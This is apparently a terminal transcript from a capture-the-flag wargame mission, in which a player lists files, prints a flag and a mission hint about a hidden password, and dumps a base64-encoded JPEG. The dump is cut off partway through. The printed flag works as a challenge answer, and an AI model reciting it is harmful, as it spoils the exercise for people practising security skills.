21 iris
iris@venus:~$ ls -la total 60 drwxr-x--- 3 root iris 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 iris iris 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 iris iris 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 iris iris 807 Apr 23 2023 .profile drwxr-xr-x 2 root root 4096 Apr 5 06:28 .ssh -rw-r----- 1 root iris 17484 Apr 5 06:28 eloise -rw-r----- 1 root iris 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root iris 16 Apr 5 06:28 irispass.txt -rw-r----- 1 root iris 195 Apr 5 06:27 mission.txt iris@venus:~$ cat flagz.txt 8===ClrdWOqlZ1vL61zSk9Va===D~~ iris@venus:~$ cat mission.txt ################ # MISSION 0x21 # ################ ## EN ## User eloise has saved her password in a particular way. ## ES ## La usuaria eloise ha guardado su password de una forma particular. iris@venus:~$ catt eloise -bash: catt: command not found iris@venus:~$ cat eloise /9j/4AAQSkZJRgABAQEAYABgAAD/4RDSRXhpZgAATU0AKgAAAAgABAE7AAIAAAAEc01MAIdpAAQA AAABAAAISpydAAEAAAAIAAAQwuocAAcAAAgMAAAAPgAAAAAc6gAAAAgAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFkAMAAgAAABQAABCY kAQAAgAAABQAABCskpEAAgAAAAM4NQAAkpIAAgAAAAM4NQAA6hwABwAACAwAAAiMAAAAABzqAAAA CAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAMjAyMToxMToxMCAxMDoxODowMwAyMDIxOjExOjEwIDEwOjE4OjAzAAAAcwBNAEwAAAD/4QsW aHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQgYmVnaW49J++7vycgaWQ9J1c1 TTBNcENlaGlIenJlU3pOVGN6a2M5ZCc/Pg0KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczpt ZXRhLyI+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJk Zi1zeW50YXgtbnMjIj48cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0idXVpZDpmYWY1YmRkNS1i YTNkLTExZGEtYWQzMS1kMzNkNzUxODJmMWIiIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMv ZWxlbWVudHMvMS4xLyIvPjxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSJ1dWlkOmZhZjViZGQ1 LWJhM2QtMTFkYS1hZDMxLWQzM2Q3NTE4MmYxYiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUu Y29tL3hhcC8xLjAvIj48eG1wOkNyZWF0ZURhdGU+MjAyMS0xMS0xMFQxMDoxODowMy44NDk8L3ht cDpDcmVhdGVEYXRlPjwvcmRmOkRlc2NyaXB0aW9uPjxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0 PSJ1dWlkOmZhZjViZGQ1LWJhM2QtMTFkYS1hZDMxLWQzM2Q3NTE4MmYxYiIgeG1sbnM6ZGM9Imh0 dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIj48ZGM6Y3JlYXRvcj48cmRmOlNlcSB4bWxu czpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPjxyZGY6 bGk+c01MPC9yZGY6bGk+PC9yZGY6U2VxPg0KCQkJPC9kYzpjcmVhdG9yPjwvcmRmOkRlc2NyaXB0 aW9uPjwvcmRmOlJERj48L3g6eG1wbWV0YT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAg ICAgICAgICAgICAgICAgICAgICAgICAgPD94cGFja2V0IGVuZD0ndyc/Pv/bAEMABwUFBgUEBwYF BggHBwgKEQsKCQkKFQ8QDBEYFRoZGBUYFxseJyEbHSUdFxgiLiIlKCkrLCsaIC8zLyoyJyorKv/b AEMBBwgICgkKFAsLFCocGBwqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKv/AABEIAGYBigMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUG BwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR 8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5 eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj 5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv/xAC1EQAC AQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXx FxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqS k5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T1 9vf4+fr/2gAMAwEAAhEDEQA/APpGiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC iiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKK KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo oAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiig Aooqrql1PZaRd3Vnbfa7iCF5I7ffs81gCQu7BxnpnBpNpK7Gk27ItUVyvw48dQfEPwbDrsFr9idp HimtjL5hidT03YGcjB6DrWRp3xXg1C88aMNMKaX4UDB777Ru+0uoYsoTbxgqRnJ7etOXu3v2v8hL Xbvb5nT+I/GPh3wjbpL4k1i108SAlFlf53x12oPmb8BWFovxl+H3iC9W00zxPamdyFRLhHt95PQA yKoJPoK86+FHw9tPiLby/ET4jR/2ve6lO5tLaZj5MMasVHydCMggKcjA6Emu/wDE3wW8C+JNJktP +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 